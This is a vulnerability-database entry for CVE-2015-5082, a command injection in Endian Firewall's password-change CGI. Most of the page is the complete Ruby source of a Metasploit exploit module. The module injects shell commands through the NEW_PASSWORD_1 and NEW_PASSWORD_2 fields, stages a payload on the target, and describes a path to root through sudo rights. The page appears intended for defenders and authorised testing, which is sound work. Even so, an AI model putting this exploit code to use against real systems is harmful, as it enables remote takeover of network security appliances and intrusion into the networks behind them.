CVE-2015-5082

critical

Published 2015-09-28 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2 parameter to cgi-bin/chpasswd.cgi.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-37426 remote cgi

Ben Lincoln · 2015-06-29

Endian Firewall < 3.0.0 - OS Command Injection

Source code queued for fetch — refresh in a moment.

EDB-37428 remote cgi

Ben Lincoln · 2015-06-29

Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)

Source code queued for fetch — refresh in a moment.

EDB-38096 remote linux verified ruby · 6 KB

Metasploit · 2015-09-07

Endian Firewall - Password Change Command Injection (Metasploit)

ruby exploit Source: Exploit-DB

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Endian Firewall Proxy Password Change Command Injection',
      'Description' => %q{
        This module exploits an OS command injection vulnerability in a
        web-accessible CGI script used to change passwords for locally-defined
        proxy user accounts. Valid credentials for such an account are
        required.

        Command execution will be in the context of the "nobody" account, but
        this account had broad sudo permissions, including to run the script
        /usr/local/bin/chrootpasswd (which changes the password for the Linux
        root account on the system to the value specified by console input
        once it is executed).

        The password for the proxy user account specified will *not* be
        changed by the use of this module, as long as the target system is
        vulnerable to the exploit.

        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
        HTTP basic auth credentials as well to exploit this vulnerability.
        Use the USERNAME and PASSWORD advanced options to specify these values
        if required.

        Versions >= 3.0.0 still contain the vulnerable code, but it appears to
        never be executed due to a bug in the vulnerable CGI script which also
        prevents normal use (http://jira.endian.com/browse/UTM-1002).

        Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
        (http://bugs.endian.com/print_bug_page.php?bug_id=3083).

        Tested successfully against the following versions of EFW Community:

        1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.

        Should function against any version from 1.1 RC5 to 2.2.x, as well as
        2.4.1 and 2.5.x.
      },
      'Author' => [
        'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
      ],
      'References' => [
        ['CVE', '2015-5082'],
        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
        ['EDB', '37426'],
        ['EDB', '37428']
      ],
      'Privileged'  => false,
      'Platform'    => %w{ linux },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d",
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 10443
        },
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 28 2015',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
        '/cgi-bin/chpasswd.cgi']),
      OptString.new('EFW_USERNAME', [true,
        'Valid proxy account username for the target system']),
      OptString.new('EFW_PASSWORD', [true,
        'Valid password for the proxy user account']),
      OptString.new('RPATH', [true,
        'Target PATH for binaries used by the CmdStager', '/bin'])
     ], self.class)

    register_advanced_options(
      [
        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
      ], self.class)

  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig,
        "#{peer} - Failed to store payload inside executable, " +
        "please select a native payload")
    end

    execute_cmdstager(:linemax => 200, :nodelete => true)
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

    post_data = Rex::MIME::Message.new
    post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
    post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
    post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
    post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
    post_data.add_part('  Change password', nil, nil, 'form-data; name="SUBMIT"')

    data = post_data.to_s
    boundary = post_data.bound

    referer_url =
      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
      "#{datastore['TARGETURI']}"


    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => datastore['TARGETURI'],
        'ctype' => "multipart/form-data; boundary=#{boundary}",
        'headers' => {
          'Referer' => referer_url
        },
        'data' => data
      })

     if res
       if res.code == 401
         fail_with(Failure::NoAccess,
           "#{rhost}:#{rport} - Received a 401 HTTP response - " +
           "specify web admin credentials using the USERNAME " +
           "and PASSWORD advanced options to target this host.")
       end
       if res.code == 404
         fail_with(Failure::Unreachable,
           "#{rhost}:#{rport} - Received a 404 HTTP response - " +
           "your TARGETURI value is most likely not correct")
       end
     end

  end

end

Metasploit modules

exploit_linux/http/efw_chpasswd_exec rank 600

Endian Firewall Proxy Password Change Command Injection

Source fetch failed: fetch_error — view the original via the link above.

Application impact

Vendor	Product	Versions	Fixed
endian_firewall	endian_firewall	`{"endIncluding":"2.5.1"}`

References

CWEs

CWE-77

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.